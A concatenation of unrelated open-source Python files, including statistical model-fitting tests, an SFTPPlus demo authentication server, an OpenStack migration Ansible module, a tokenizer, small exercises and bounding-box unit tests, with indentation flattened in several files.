dist_description_hs = {'name': 'Weibull_Exp',
'dependency': (0, None, 0, None), # shape, location, scale, shape2
'functions': ('something', None, 'alpha3', None), # shape, location, scale, shape2
'min_datapoints_for_fit': 20}
with self.assertRaises(ValueError):
# Fit the model to the data.
fit = Fit((sample_v, sample_hs),
(dist_description_v, dist_description_hs))
# This structure is incorrect as there will be only 1 or 2 intervals
# that fit 2000 datapoints.
dist_description_v = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
'width_of_intervals': 2}
dist_description_hs = {'name': 'Weibull_Exp',
'dependency': (0, None, 0, None), # shape, location, scale, shape2
'functions': ('logistics4', None, 'alpha3', None), # shape, location, scale, shape2
'min_datapoints_for_fit': 2000}
with self.assertRaises(RuntimeError):
# Fit the model to the data.
fit = Fit((sample_v, sample_hs),
(dist_description_v, dist_description_hs))
# This structure is incorrect as alpha3 is only compatible with
# logistics4.
dist_description_v = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
'width_of_intervals': 2}
dist_description_hs = {'name': 'Weibull_Exp',
'fixed_parameters' : (None, None, None, 5), # shape, location, scale, shape2
'dependency': (0, None, 0, None), # shape, location, scale, shape2
'functions': ('power3', None, 'alpha3', None), # shape, location, scale, shape2
'min_datapoints_for_fit': 20}
with self.assertRaises(TypeError):
# Fit the model to the data.
fit = Fit((sample_v, sample_hs),
(dist_description_v, dist_description_hs))
# This structure is incorrect as only shape2 of an exponentiated Weibull
# distribution can be fixed at the moment.
dist_description_v = {'name': 'Lognormal',
'dependency': (None, None, None, None),
'fixed_parameters': (None, None, 5, None), # shape, location, scale, shape2
'width_of_intervals': 2}
with self.assertRaises(NotImplementedError):
# Fit the model to the data.
fit = Fit((sample_v, ),
(dist_description_v, ))
# This structure is incorrect as only shape2 of an exponentiated Weibull
# distribution can be fixed at the moment.
dist_description_v = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
'width_of_intervals': 2}
dist_description_hs = {'name': 'Weibull_Exp',
'fixed_parameters' : (None, None, 5, None), # shape, location, scale, shape2
'dependency': (0, None, 0, None), # shape, location, scale, shape2
'functions': ('logistics4', None, 'alpha3', None), # shape, location, scale, shape2
'min_datapoints_for_fit': 20}
with self.assertRaises(NotImplementedError):
# Fit the model to the data.
fit = Fit((sample_v, sample_hs),
(dist_description_v, dist_description_hs))
def test_weighting_of_dependence_function(self):
"""
Tests if using weights when the dependence function is fitted works
correctly.
"""
sample_v, sample_hs, label_v, label_hs = read_benchmark_dataset(path='tests/testfiles/1year_dataset_D.txt')
# Define the structure of the probabilistic model that will be fitted to the
# dataset.
dist_description_v = {'name': 'Weibull_Exp',
'dependency': (None, None, None, None),
'width_of_intervals': 2}
dist_description_hs = {'name': 'Weibull_Exp',
'fixed_parameters' : (None, None, None, 5), # shape, location, scale, shape2
'dependency': (0, None, 0, None), # shape, location, scale, shape2
'functions': ('logistics4', None, 'alpha3', None), # shape, location, scale, shape2
'min_datapoints_for_fit': 20,
'do_use_weights_for_dependence_function': False}
# Fit the model to the data.
fit = Fit((sample_v, sample_hs),
(dist_description_v, dist_description_hs))
dist1_no_weights = fit.mul_var_dist.distributions[1]
# Now perform a fit with weights.
dist_description_hs = {'name': 'Weibull_Exp',
'fixed_parameters' : (None, None, None, 5), # shape, location, scale, shape2
'dependency': (0, None, 0, None), # shape, location, scale, shape2
'functions': ('logistics4', None, 'alpha3', None), # shape, location, scale, shape2
'min_datapoints_for_fit': 20,
'do_use_weights_for_dependence_function': True}
# Fit the model to the data.
fit = Fit((sample_v, sample_hs),
(dist_description_v, dist_description_hs))
dist1_with_weights = fit.mul_var_dist.distributions[1]
# Make sure the two fitted dependence functions are different.
d = np.abs(dist1_with_weights.scale(0) - dist1_no_weights.scale(0)) / \
np.abs(dist1_no_weights.scale(0))
self.assertGreater(d, 0.01)
# Make sure they are not too different.
d = np.abs(dist1_with_weights.scale(20) - dist1_no_weights.scale(20)) / \
np.abs(dist1_no_weights.scale(20))
self.assertLess(d, 0.5)
# Source file: videoclip_sources/e004.py (ChrisScarred/misty2py-skills, MIT license)
import time
from misty2py.robot import Misty
from misty2py.utils.env_loader import EnvLoader
from misty2py_skills.utils.utils import get_abs_path
env_loader = EnvLoader(get_abs_path(".env"))
m = Misty(env_loader.get_ip())
d = m.event("subscribe", type="BatteryCharge")
e_name = d.get("event_name")
time.sleep(1)
d = m.event("get_data", name=e_name)
# do something with the data here
d = m.event("unsubscribe", name=e_name)
# Source file: api-server.py (proatria/sftpplus-api-example, MIT license)
"""
Run a simple HTTP server which provides API endpoints for SFTPPlus.
Usage:
    api-server.py [options]

    -h --help                 Show this help.
    -p --port=8000            Listen to a specific port. [default: 8080]
    -a --address=127.0.0.1    Listen on specific address. [default: 0.0.0.0]
    -c --certificate=PATH     Enable HTTPS by defining the path
                              to a file containing server key, certificate, and CA chain,
                              all in PEM format and stored in a single file.
    -f --flaky                Introduce random errors to test SFTPPlus API retry functionality.

The following API endpoints are provided:

* /auth-api - For the authentication API
* /event-api - For the event handler API
"""
from __future__ import absolute_import, unicode_literals
import base64
import json
import ssl
from random import randint
from aiohttp import web
from docopt import docopt
# Command line handling part.
arguments = docopt(__doc__)
# Convert arguments to usable types.
port = int(arguments["--port"])
# Need to escape the address for ipv6.
address = arguments["--address"].replace(":", r"\:")
is_flaky = arguments["--flaky"]
certificate = arguments["--certificate"]
# Set to lower values to increase the probability of a failure.
_FLAKY_DEGREE = 3
# DB with accepted accounts.
# Each key is the name of an user.
# Each value contains the accepted password and/or SSH-key.
ACCOUNTS = {
    # An account with some custom configuration.
    # Configuration that is not explicitly defined here is extracted based on
    # the SFTPPlus group.
    "test-user": {
        "password": "test-pass",
        # Just the public key value, in OpenSSH format.
        # Without the key type or comments.
        "ssh-public-key": "AAAAB3NzaC1yc2EAAAADAQABAAAAgQC4fV6tSakDSB6ZovygLsf1iC9P3tJHePTKAPkPAWzlu5BRHcmAu0uTjn7GhrpxbjjWMwDVN0Oxzw7teI0OEIVkpnlcyM6L5mGk+X6Lc4+lAfp1YxCR9o9+FXMWSJP32jRwI+4LhWYxnYUldvAO5LDz9QeR0yKimwcjRToF6/jpLw==",
        "configuration": {
            "home_folder_path": "/tmp",
            # EXTRA_DATA is not yet supported.
            # 'extra_data': {
            #     'file_api_token': 'fav1_some_value',
            # },
        },
    },
    # An account with default configuration extracted from
    # the default SFTPPlus group.
    # SSH-Key authentication is disabled for this user.
    "default-user": {
        "password": "default-pass",
        "ssh-public-key": "",
        "configuration": {},
    },
}
async def handle_root(request):
    return web.Response(text="Demo SFTPPlus API endpoints.")
async def handle_auth(request):
    """
    This is triggered for authentication API calls.
    """
    request_json = await get_json(request)

    print("\n\n")
    print("-" * 80)
    print("New authentication request received")
    print(json.dumps(request_json, indent=2))

    if is_flaky and randint(0, _FLAKY_DEGREE) == 0:
        print("TRIGGERING AN EMULATED FAILURE")
        return web.Response(status=500, text="Failed to process the request")

    credentials = request_json["credentials"]
    account = ACCOUNTS.get(credentials["username"], None)

    if account is None:
        # This is not an account handled by this authentication API.
        # Inform SFTPPlus that it can try to authenticate the user via another
        # method (LDAP, or another HTTP authentication server).
        print("UNKNOWN USER")
        return web.Response(
            status=401, text="User not handled by our API. Try other method."
        )

    response = {"account": account.get("configuration", {})}

    if credentials["type"] in ["password", "password-basic-auth"]:
        # We have password based authentication.
        if credentials["content"] != account["password"]:
            print("INVALID PASSWORD")
            return web.Response(status=403, text="Password rejected.")

        # Valid password.
        print("VALID PASSWORD")
        return web.json_response(response)

    if credentials["type"] == "ssh-key":
        # We have SSH-key based authentication.
        # The keys are encoded as BASE64, but we compare them as bytes.
        if base64.b64decode(credentials["content"]) != base64.b64decode(
            account["ssh-public-key"]
        ):
            print("INVALID SSH-KEY")
            return web.Response(status=403, text="SSH-Key rejected.")

        # Valid SSH key authentication.
        print("VALID SSH-KEY")
        return web.json_response(response)

    return web.Response(status=403, text="Credentials type not supported.")
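The credential-checking branches above can be condensed into a pure function that is easy to unit test without the aiohttp plumbing. The sketch below is illustrative (the function name, `accounts` fixture, and status-code return are assumptions), but the decision logic mirrors handle_auth: 401 for unknown users, 403 for bad or unsupported credentials, 200 for a match:

```python
import base64

def auth_status(credentials, accounts):
    # Mirror of the decision logic in handle_auth, minus the web layer.
    account = accounts.get(credentials["username"])
    if account is None:
        return 401  # Unknown user: let SFTPPlus try other auth methods.
    if credentials["type"] in ("password", "password-basic-auth"):
        return 200 if credentials["content"] == account["password"] else 403
    if credentials["type"] == "ssh-key":
        # Keys are BASE64-encoded; compare the decoded bytes.
        offered = base64.b64decode(credentials["content"])
        known = base64.b64decode(account["ssh-public-key"])
        return 200 if offered == known else 403
    return 403  # Credentials type not supported.

accounts = {"demo": {"password": "secret", "ssh-public-key": ""}}
print(auth_status(
    {"username": "demo", "type": "password", "content": "secret"}, accounts))  # 200
```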
async def handle_event(request):
    """
    This is triggered by the event handler API calls.
    """
    print("\n\n")
    print("-" * 80)
    print("New event handler call")
    print("-" * 80)
    print("Headers:")
    for key, value in request.headers.items():
        print(f" {key}: {value}")
    print("-" * 80)
    print("Payload:")
    await get_json(request)

    if is_flaky and randint(0, _FLAKY_DEGREE) == 0:
        print("TRIGGERING AN EMULATED FAILURE")
        return web.Response(status=500, text="Failed to process the request")

    # An empty response body can be used to confirm that the event
    # was received successfully by the API server.
    # This instructs SFTPPlus not to retry.
    return web.Response(status=204, text="")
async def get_json(request):
    """
    Return the json dict from `request`.

    It also logs the JSON.
    """
    result = {}
    try:
        result = await request.json()
    except json.JSONDecodeError:
        print("INVALID JSON RECEIVED")
        text = await request.text()
        print(text)
        result = {}
    else:
        print(json.dumps(result, indent=2))
    return result
app = web.Application()
app.add_routes(
    [
        web.get("/", handle_root),
        web.post("/auth-api", handle_auth),
        web.post("/event-api", handle_event),
    ]
)
ssl_context = None
if certificate:
    # CLIENT_AUTH: this context authenticates our server to connecting
    # clients (SERVER_AUTH would configure a client-side context).
    ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
    ssl_context.load_cert_chain(certificate, certificate)
if __name__ == "__main__":
    web.run_app(app, host=address, port=port, ssl_context=ssl_context)
# Source file: src/houdini_package_runner/items/base.py (captainhammy/houdini_package_runner, MIT license)
"""This module contains a base runnable item."""
# =============================================================================
# IMPORTS
# =============================================================================
# Future
from __future__ import annotations
# Standard Library
from abc import ABC, abstractmethod
from typing import TYPE_CHECKING, List
# Imports for type checking.
if TYPE_CHECKING:
    import pathlib

    import houdini_package_runner.runners.base
# =============================================================================
# CLASSES
# =============================================================================
class BaseItem(ABC):
    """Base class for a runnable item.

    :param write_back: Whether the item should write itself back to disk.
    """

    def __init__(self, write_back: bool = False) -> None:
        self._contents_changed = False
        self._ignored_builtins: List[str] = []
        self._is_single_line = False
        self._is_test_item = False
        self._write_back = write_back

    def __repr__(self):
        return f"<{self.__class__.__name__}>"

    # -------------------------------------------------------------------------
    # PROPERTIES
    # -------------------------------------------------------------------------

    @property
    def contents_changed(self) -> bool:
        """Whether the contents of the item have changed."""
        return self._contents_changed

    @contents_changed.setter
    def contents_changed(self, contents_changed: bool):
        self._contents_changed = contents_changed

    # -------------------------------------------------------------------------

    @property
    def ignored_builtins(self) -> List[str]:
        """A list of known builtins to ignore for checks which look for imports."""
        return self._ignored_builtins

    # -------------------------------------------------------------------------

    @property
    def is_single_line(self) -> bool:
        """Whether the item code is on a single line."""
        return self._is_single_line

    # -------------------------------------------------------------------------

    @property
    def is_test_item(self) -> bool:
        """Whether the item is a test related item."""
        return self._is_test_item

    @is_test_item.setter
    def is_test_item(self, is_test_item: bool):
        self._is_test_item = is_test_item

    # -------------------------------------------------------------------------

    @property
    def write_back(self) -> bool:
        """Whether the item should write changes back."""
        return self._write_back

    @write_back.setter
    def write_back(self, write_back):
        self._write_back = write_back

    # -------------------------------------------------------------------------
    # METHODS
    # -------------------------------------------------------------------------

    @abstractmethod
    def process(
        self, runner: houdini_package_runner.runners.base.HoudiniPackageRunner
    ) -> int:
        """Process an item.

        :param runner: The package runner processing the item.
        :return: The process return code.
        """
class BaseFileItem(BaseItem):
    """Base class for a runnable file item.

    :param path: The path for the item.
    :param write_back: Whether the item should write itself back to disk.
    """

    def __init__(self, path: pathlib.Path, write_back: bool = False) -> None:
        super().__init__(write_back=write_back)

        self._path = path

    def __repr__(self):
        return f"<{self.__class__.__name__} {self.path}>"

    # -------------------------------------------------------------------------
    # PROPERTIES
    # -------------------------------------------------------------------------

    @property
    def path(self) -> pathlib.Path:
        """The path on disk."""
        return self._path

    # -------------------------------------------------------------------------
    # METHODS
    # -------------------------------------------------------------------------

    @abstractmethod
    def process(
        self, runner: houdini_package_runner.runners.base.HoudiniPackageRunner
    ) -> int:
        """Process a file item.

        :param runner: The package runner processing the item.
        :return: The process return code.
        """
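To make the abstract contract concrete, a hypothetical minimal subclass might look like the sketch below. It is self-contained, so it re-declares a trimmed copy of BaseFileItem rather than importing the real one; `LineCountItem`, its line-counting behaviour, and the `runner=None` stand-in are all illustrative assumptions:

```python
import pathlib
import tempfile
from abc import ABC, abstractmethod

# Trimmed re-declaration of BaseFileItem so this sketch runs standalone.
class BaseFileItem(ABC):
    def __init__(self, path: pathlib.Path, write_back: bool = False) -> None:
        self._path = path
        self._write_back = write_back

    @property
    def path(self) -> pathlib.Path:
        return self._path

    @abstractmethod
    def process(self, runner) -> int:
        """Process an item, returning the process return code."""

class LineCountItem(BaseFileItem):
    """Toy item whose 'processing' just counts lines in its file."""

    def process(self, runner) -> int:
        # A real item would invoke the runner's tooling; here we only
        # read the file and report its line count.
        return len(self.path.read_text().splitlines())

with tempfile.NamedTemporaryFile("w", suffix=".py", delete=False) as handle:
    handle.write("a = 1\nb = 2\n")

item = LineCountItem(pathlib.Path(handle.name))
print(item.process(runner=None))  # 2
```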
# Source file: test.py (IldusTim/QAStudy, Apache-2.0 license)
# -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
import math
from selenium.webdriver.support.ui import Select
import os
import time
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
link = "http://suninjuly.github.io/explicit_wait2.html"
opt = webdriver.ChromeOptions()
opt.add_experimental_option('w3c', False)
browser = webdriver.Chrome(chrome_options=opt)
browser.implicitly_wait(5, 0.5)
browser.get(link)
button = browser.find_element_by_id("book")
price = WebDriverWait(browser, 12).until(EC.text_to_be_present_in_element((By.ID, "price"),"10000 RUR"))
button.click()
def calc(x):
    return str(math.log(abs(12 * math.sin(int(x)))))
browser.find_element_by_class_name("btn-primary").click()
# new_window = browser.window_handles[1]
# browser.switch_to.window(new_window)
x_element = browser.find_element_by_id("input_value")
x = x_element.text
y = calc(x)
browser.find_element_by_id("answer").click()
browser.find_element_by_id("answer").send_keys(y)
browser.find_element_by_id("solve").click()
#!/usr/bin/python
# file: os_migrate/plugins/modules/import_workload_create_instance.py (repo: jbadiapa/os-migrate, license: Apache-2.0)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: import_workload_create_instance
short_description: Create NBD exports of OpenStack volumes
extends_documentation_fragment: openstack
version_added: "2.9.0"
author: "OpenStack tenant migration tools (@os-migrate)"
description:
- "Take an instance from an OS-Migrate YAML structure, and export its volumes over NBD."
options:
auth:
description:
- Dictionary with parameters for chosen auth type on the destination cloud.
required: true
type: dict
auth_type:
description:
- Auth type plugin for destination OpenStack cloud. Can be omitted if using password authentication.
required: false
type: str
region_name:
description:
- Destination OpenStack region name. Can be omitted if using default region.
required: false
type: str
availability_zone:
description:
- Availability zone.
required: false
type: str
cloud:
description:
- Ignored. Present for backwards compatibility.
required: false
type: raw
validate_certs:
description:
- Validate HTTPS certificates when logging in to OpenStack.
required: false
type: bool
data:
description:
- Data structure with server parameters as loaded from OS-Migrate workloads YAML file.
required: true
type: dict
block_device_mapping:
description:
- A block_device_mapping_v2 structure from the transfer_volumes module.
- Used to attach destination volumes to the new instance in the right order.
required: true
type: list
elements: dict
'''
EXAMPLES = '''
main.yml:
- name: validate loaded resources
os_migrate.os_migrate.validate_resource_files:
paths:
- "{{ os_migrate_data_dir }}/workloads.yml"
register: workloads_file_validation
when: import_workloads_validate_file
- name: read workloads resource file
os_migrate.os_migrate.read_resources:
path: "{{ os_migrate_data_dir }}/workloads.yml"
register: read_workloads
- name: get source conversion host address
os_migrate.os_migrate.os_conversion_host_info:
auth:
auth_url: https://src-osp:13000/v3
username: migrate
password: migrate
project_domain_id: default
project_name: migration-source
user_domain_id: default
server_id: ce4dda96-5d8e-4b67-aee2-9845cdc943fe
register: os_src_conversion_host_info
- name: get destination conversion host address
os_migrate.os_migrate.os_conversion_host_info:
auth:
auth_url: https://dest-osp:13000/v3
username: migrate
password: migrate
project_domain_id: default
project_name: migration-destination
user_domain_id: default
server_id: 2d2afe57-ace5-4187-8fca-5f10f9059ba1
register: os_dst_conversion_host_info
- name: import workloads
include_tasks: workload.yml
loop: "{{ read_workloads.resources }}"
workload.yml:
- block:
- name: preliminary setup for workload import
os_migrate.os_migrate.import_workload_prelim:
auth:
auth_url: https://dest-osp:13000/v3
username: migrate
password: migrate
project_domain_id: default
project_name: migration-destination
user_domain_id: default
validate_certs: False
src_conversion_host: "{{ os_src_conversion_host_info.openstack_conversion_host }}"
src_auth:
auth_url: https://src-osp:13000/v3
username: migrate
password: migrate
project_domain_id: default
project_name: migration-source
user_domain_id: default
src_validate_certs: False
data: "{{ item }}"
data_dir: "{{ os_migrate_data_dir }}"
register: prelim
- debug:
msg:
- "{{ prelim.server_name }} log file: {{ prelim.log_file }}"
- "{{ prelim.server_name }} progress file: {{ prelim.state_file }}"
when: prelim.changed
- name: expose source volumes
os_migrate.os_migrate.import_workload_export_volumes:
auth: "{{ os_migrate_src_auth }}"
auth_type: "{{ os_migrate_src_auth_type|default(omit) }}"
region_name: "{{ os_migrate_src_region_name|default(omit) }}"
validate_certs: "{{ os_migrate_src_validate_certs|default(omit) }}"
ca_cert: "{{ os_migrate_src_ca_cert|default(omit) }}"
client_cert: "{{ os_migrate_src_client_cert|default(omit) }}"
client_key: "{{ os_migrate_src_client_key|default(omit) }}"
conversion_host:
"{{ os_src_conversion_host_info.openstack_conversion_host }}"
data: "{{ item }}"
log_file: "{{ os_migrate_data_dir }}/{{ prelim.server_name }}.log"
state_file: "{{ os_migrate_data_dir }}/{{ prelim.server_name }}.state"
ssh_key_path: "{{ os_migrate_conversion_keypair_private_path }}"
register: exports
when: prelim.changed
- name: transfer volumes to destination
os_migrate.os_migrate.import_workload_transfer_volumes:
auth: "{{ os_migrate_dst_auth }}"
auth_type: "{{ os_migrate_dst_auth_type|default(omit) }}"
region_name: "{{ os_migrate_dst_region_name|default(omit) }}"
validate_certs: "{{ os_migrate_dst_validate_certs|default(omit) }}"
ca_cert: "{{ os_migrate_dst_ca_cert|default(omit) }}"
client_cert: "{{ os_migrate_dst_client_cert|default(omit) }}"
client_key: "{{ os_migrate_dst_client_key|default(omit) }}"
data: "{{ item }}"
conversion_host:
"{{ os_dst_conversion_host_info.openstack_conversion_host }}"
ssh_key_path: "{{ os_migrate_conversion_keypair_private_path }}"
transfer_uuid: "{{ exports.transfer_uuid }}"
src_conversion_host_address:
"{{ os_src_conversion_host_info.openstack_conversion_host.address }}"
volume_map: "{{ exports.volume_map }}"
state_file: "{{ os_migrate_data_dir }}/{{ prelim.server_name }}.state"
log_file: "{{ os_migrate_data_dir }}/{{ prelim.server_name }}.log"
register: transfer
when: prelim.changed
- name: create destination instance
os_migrate.os_migrate.import_workload_create_instance:
auth: "{{ os_migrate_dst_auth }}"
auth_type: "{{ os_migrate_dst_auth_type|default(omit) }}"
region_name: "{{ os_migrate_dst_region_name|default(omit) }}"
validate_certs: "{{ os_migrate_dst_validate_certs|default(omit) }}"
ca_cert: "{{ os_migrate_dst_ca_cert|default(omit) }}"
client_cert: "{{ os_migrate_dst_client_cert|default(omit) }}"
client_key: "{{ os_migrate_dst_client_key|default(omit) }}"
data: "{{ item }}"
block_device_mapping: "{{ transfer.block_device_mapping }}"
register: os_migrate_destination_instance
when: prelim.changed
rescue:
- fail:
msg: "Failed to import {{ item.params.name }}!"
'''
RETURN = '''
server_id:
description: The ID of the newly created server.
returned: On successful creation of migrated server on destination cloud.
type: str
sample: 059635b7-451f-4a64-978a-7c2e9e4c15ff
'''
from ansible.module_utils.basic import AnsibleModule
# Import openstack module utils from ansible_collections.openstack.cloud.plugins as per ansible 3+
try:
from ansible_collections.openstack.cloud.plugins.module_utils.openstack \
import openstack_full_argument_spec, openstack_cloud_from_module
except ImportError:
# If this fails fall back to ansible < 3 imports
from ansible.module_utils.openstack \
import openstack_full_argument_spec, openstack_cloud_from_module
from ansible_collections.os_migrate.os_migrate.plugins.module_utils import server
def run_module():
argument_spec = openstack_full_argument_spec(
auth=dict(type='dict', no_log=True, required=True),
data=dict(type='dict', required=True),
block_device_mapping=dict(type='list', required=True, elements='dict'),
)
result = dict(
changed=False,
)
module = AnsibleModule(
argument_spec=argument_spec,
)
sdk, conn = openstack_cloud_from_module(module)
block_device_mapping = module.params['block_device_mapping']
ser_server = server.Server.from_data(module.params['data'])
sdk_server = ser_server.create(conn, block_device_mapping)
# Some info (e.g. flavor ID) will only become available after the
# server is in ACTIVE state, we need to wait for it.
sdk_server = conn.compute.wait_for_server(sdk_server, failures=['ERROR'], wait=600)
dst_ser_server = server.Server.from_sdk(conn, sdk_server)
if sdk_server:
result['changed'] = True
result['server'] = dst_ser_server.data
result['server_id'] = sdk_server.id
module.exit_json(**result)
def main():
run_module()
if __name__ == '__main__':
main()
# file: src/config.py (repo: BRAVO68WEB/architus, license: MIT)
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
# from src.commands import *
# import src.commands as command_modules
secret_token = None
db_user = None
db_pass = None
sessions = {}
try:
lines = [line.rstrip('\n') for line in open('.secret_token')]
secret_token = lines[0]
db_user = lines[1]
db_pass = lines[2]
client_id = lines[3]
client_secret = lines[4]
twitter_consumer_key = lines[5]
twitter_consumer_secret = lines[6]
twitter_access_token_key = lines[7]
twitter_access_token_secret = lines[8]
scraper_token = lines[9]
except Exception as e:
print(e)
    print('error reading .secret_token, make sure it exists and contains all expected lines')
def get_session(pid=None):
if pid in sessions:
return sessions[pid]
print("creating postgres session")
try:
engine = create_engine("postgresql://{}:{}@localhost/autbot".format(db_user, db_pass))
Session = sessionmaker(bind=engine)
session = Session()
sessions[pid] = session
except Exception as e:
session = None
print('failed to connect to database')
print(e)
return session
session = get_session()
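The `get_session` helper above memoizes one session per `pid` in the module-level `sessions` dict, so repeated calls with the same key reuse the same connection. The caching skeleton, separated from the SQLAlchemy specifics, looks like this (a sketch with a stand-in resource, not the module's actual code):

```python
# Cache-by-key skeleton behind get_session (stand-in resource, no database).
sessions = {}

def get_session(pid=None):
    if pid in sessions:
        return sessions[pid]
    session = object()  # stand-in for an expensive connection/session
    sessions[pid] = session
    return session

a = get_session("worker-1")
b = get_session("worker-1")
# a is b: the second call reuses the cached object for the same key
```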
# file: kenlm_training/cc_net/tokenizer.py (repo: ruinunca/data_tooling, license: Apache-2.0)
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import time
from typing import Dict, Optional
import sacremoses # type: ignore
from cc_net import jsonql, text_normalizer
class RobustTokenizer(jsonql.Transformer):
"""Moses tokenizer with the expected preprocessing."""
LANG_WITHOUT_ACCENT = {"en", "my"}
def __init__(self, lang: str):
super().__init__()
self.lang = lang
self.moses = sacremoses.MosesTokenizer(lang)
self.rm_accent = lang in self.LANG_WITHOUT_ACCENT
self.ready = True
def do(self, text: str):
text = text_normalizer.normalize(
text, accent=self.rm_accent, case=False, numbers=False, punct=True
)
text = text_normalizer.normalize_spacing_for_tok(text, language=self.lang)
return self.moses.tokenize(text, return_str=True, escape=False)
class DocTokenizer(jsonql.Transformer):
"""Tokenize the text found in `output_field and store the result in `output_field`."""
def __init__(
self,
field: str,
output_field: str = "tokenized",
language_field: str = "language",
):
super().__init__()
self.field = field
self.output_field = output_field
self.language_field = language_field
self.n_docs = 0
self.tokenizers: Dict[str, RobustTokenizer] = {}
def get_tokenizer(self, lang: str) -> Optional[RobustTokenizer]:
cache = self.tokenizers
if lang in cache:
return cache[lang]
if lang in ("th", "zh", "ja"):
# TODO find a tokenizer for those languages
return None
cache[lang] = RobustTokenizer(lang)
return cache[lang]
def do(self, document):
lang = document[self.language_field]
tok = self.get_tokenizer(lang)
if not tok:
return document
self.n_docs += 1
lines = document[self.field].split("\n")
tokenized = "\n".join(tok(l) for l in lines)
document[self.output_field] = tokenized
return document
def summary(self):
delay = (time.time() - self.start_time) / 3600
speed = self.n_docs / delay
return [
f"Tokenized {self.n_docs:_} documents in {delay:.2}h ({speed:.1} doc/s)."
]
# file: scripts/exercicios/ex063.py (repo: RuanBarretodosSantos/python, license: MIT)
cont = 3
t1 = 0
t2 = 1
print('-----' * 12)
print('Sequência de Fibonacci')
print('-----' * 12)
valor = int(input('Quantos termos você quer mostrar ? '))
print('~~~~~' * 12)
print(f'{t1} ➙ {t2} ' , end='➙ ')
while cont <= valor:
t3 = t1 + t2
print(f' {t3}', end=' ➙ ')
t1 = t2
t2 = t3
cont += 1
print(' F I M')
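The exercise's while loop can be restated as a small helper that returns the sequence instead of printing it (a hypothetical refactor, not part of the original script):

```python
def fibonacci(n):
    # Return the first n Fibonacci terms, starting from 0 and 1.
    terms = [0, 1][:max(n, 0)]
    while len(terms) < n:
        terms.append(terms[-1] + terms[-2])
    return terms

# fibonacci(7) yields [0, 1, 1, 2, 3, 5, 8]
```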
#!/usr/bin/env python
# file: geometry_utils/tests/test_bound_box.py (repo: NOAA-ORR-ERD/geometry_utils, license: BSD-3-Clause)
"""
Test code for the BBox Object
"""
import numpy as np
import pytest
from geometry_utils.bound_box import (BBox,
asBBox,
NullBBox,
InfBBox,
fromBBArray,
from_points,
)
class TestConstructors():
def test_creates(self):
B = BBox(((0, 0), (5, 5)))
assert isinstance(B, BBox)
def test_type(self):
B = np.array(((0, 0), (5, 5)))
assert not isinstance(B, BBox)
def testDataType(self):
B = BBox(((0, 0), (5, 5)))
assert B.dtype == np.float
def testShape(self):
B = BBox((0, 0, 5, 5))
assert B.shape == (2, 2)
def testShape2(self):
with pytest.raises(ValueError):
BBox((0, 0, 5))
def testShape3(self):
with pytest.raises(ValueError):
BBox((0, 0, 5, 6, 7))
def testArrayConstruction(self):
A = np.array(((4, 5), (10, 12)), np.float_)
B = BBox(A)
assert isinstance(B, BBox)
def testMinMax(self):
with pytest.raises(ValueError):
BBox((0, 0, -1, 6))
def testMinMax2(self):
with pytest.raises(ValueError):
BBox((0, 0, 1, -6))
def testMinMax3(self):
# OK to have a zero-sized BB
B = BBox(((0, 0), (0, 5)))
assert isinstance(B, BBox)
def testMinMax4(self):
# OK to have a zero-sized BB
B = BBox(((10., -34), (10., -34.0)))
assert isinstance(B, BBox)
def testMinMax5(self):
# OK to have a tiny BB
B = BBox(((0, 0), (1e-20, 5)))
assert isinstance(B, BBox)
def testMinMax6(self):
# Should catch tiny difference
with pytest.raises(ValueError):
BBox(((0, 0), (-1e-20, 5)))
class TestAsBBox():
def testPassThrough(self):
B = BBox(((0, 0), (5, 5)))
C = asBBox(B)
assert B is C
def testPassThrough2(self):
B = ((0, 0), (5, 5))
C = asBBox(B)
assert B is not C
def testPassArray(self):
# Different data type
A = np.array(((0, 0), (5, 5)))
C = asBBox(A)
assert A is not C
def testPassArray2(self):
# same data type -- should be a view
A = np.array(((0, 0), (5, 5)), np.float_)
C = asBBox(A)
A[0, 0] = -10
assert C[0, 0] == A[0, 0]
class TestIntersect():
def testSame(self):
B = BBox(((-23.5, 456), (56, 532.0)))
C = BBox(((-23.5, 456), (56, 532.0)))
assert B.Overlaps(C)
def testUpperLeft(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((0, 12), (10, 32.0)))
assert B.Overlaps(C)
def testUpperRight(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((12, 12), (25, 32.0)))
assert B.Overlaps(C)
def testLowerRight(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((12, 5), (25, 15)))
assert B.Overlaps(C)
def testLowerLeft(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((-10, 5), (8.5, 15)))
assert B.Overlaps(C)
def testBelow(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((-10, 5), (8.5, 9.2)))
assert not B.Overlaps(C)
def testAbove(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((-10, 25.001), (8.5, 32)))
assert not B.Overlaps(C)
def testLeft(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((4, 8), (4.95, 32)))
assert not B.Overlaps(C)
def testRight(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((17.1, 8), (17.95, 32)))
assert not B.Overlaps(C)
def testInside(self):
B = BBox(((-15, -25), (-5, -10)))
C = BBox(((-12, -22), (-6, -8)))
assert B.Overlaps(C)
def testOutside(self):
B = BBox(((-15, -25), (-5, -10)))
C = BBox(((-17, -26), (3, 0)))
assert B.Overlaps(C)
def testTouch(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((15, 8), (17.95, 32)))
assert B.Overlaps(C)
def testCorner(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((15, 25), (17.95, 32)))
assert B.Overlaps(C)
def testZeroSize(self):
B = BBox(((5, 10), (15, 25)))
C = BBox(((15, 25), (15, 25)))
assert B.Overlaps(C)
def testZeroSize2(self):
B = BBox(((5, 10), (5, 10)))
C = BBox(((15, 25), (15, 25)))
assert not B.Overlaps(C)
